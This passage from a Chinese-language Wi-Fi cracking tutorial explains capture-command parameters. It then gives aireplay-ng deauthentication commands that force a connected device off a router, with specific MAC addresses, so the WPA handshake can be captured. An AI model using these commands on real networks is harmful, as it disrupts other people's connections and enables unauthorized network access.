参数说明:
- –bssid:路由器的MAC地址
- -c:路由器使用的信道
- -w:抓取的握手包名称,可以选择输出的路径,这里使用默认输出路径为根目录
(下图说明:BSSID为路由器MAC地址,STATION为当前连接在路由器上的设备的MAC地址)
4.另外再打开一个终端,对当前正在连接的某个设备进行攻击,使其断开与路由器的连接。(原理没有深究,大概使向目标发送大量数据,或者类似于ARP欺骗的攻击,使设备与路由器断开连接,停止攻击后,设备会自动连接上路由器,此时就可以抓取到握手包。)
aireplay-ng -0 10 -a 64:64:4A:E3:90:41 -c 9C:2E:A1:9F:9E:2F wlan0mon
或者 aireplay-ng --deauth 10 -a 64:64:4A:E3:90:41 -c 9C:2E:A1:9F:9E:2F wlan0mon